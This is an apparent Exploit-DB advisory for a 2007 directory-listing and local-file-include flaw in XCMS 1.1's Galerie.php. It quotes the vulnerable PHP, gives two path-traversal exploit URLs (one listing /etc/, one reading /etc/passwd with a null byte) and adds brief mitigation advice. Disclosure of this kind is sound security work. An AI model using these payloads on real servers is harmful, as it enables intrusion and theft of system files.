XCMS CMS Remote Directory Listing & Local File Include Vulnerability

vendor:

XCMS

by:

BlackNDoor

5.5

CVSS

MEDIUM

Remote Directory Listing & Local File Include

22, 23

CWE

Product Name: XCMS

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

XCMS CMS Remote Directory Listing & Local File Include Vulnerability

The XCMS CMS version 1.1 is vulnerable to a remote directory listing and local file inclusion vulnerability. The vulnerability exists in the 'Galerie.php' module, where the 'Lang' and 'Ent' parameters are not properly validated before being used in include and opendir functions, respectively. An attacker can exploit this vulnerability to read arbitrary files on the server and potentially execute malicious code.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input before using it in any file operations. Additionally, restricting access to sensitive directories and files can also help prevent unauthorized access.

Source

Exploit-DB raw data:

#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   XCMS : CMS
#Version::  1.1
#Type::     Remote Directory Listing & Local File Include
#
#Source::   http://groupeclan.free.fr/XCMS.zip

#Bug::
   -> Files:

      /Module/Galerie.php.php

   -> vulncode:

      if(!isset($_GET['Lang'])) { $Lang="fr"; } else { $Lang=$_GET['Lang']; }
      if(!isset($_GET['Ent'])) { $Ent='false'; } else { $Ent=$_GET['Ent']; }
      include('Lang/' . $Lang . '.lang');  <--- Local File Include
      if($Ent)
      {
	$Nb = -1;
	$Dossier = opendir("../Images/$Lang/$Ent");  <--- Directory Listing


#Exploit::

   http://www.site.com/[path to XCMS]/Module/Galerie.php?Ent=../../../../../../etc/
   http://www.site.com/[path to XCMS]/Module/Galerie.php?Lang=../../../../../../etc/passwd%00

#thanks:: str0ke

# milw0rm.com [2007-06-30]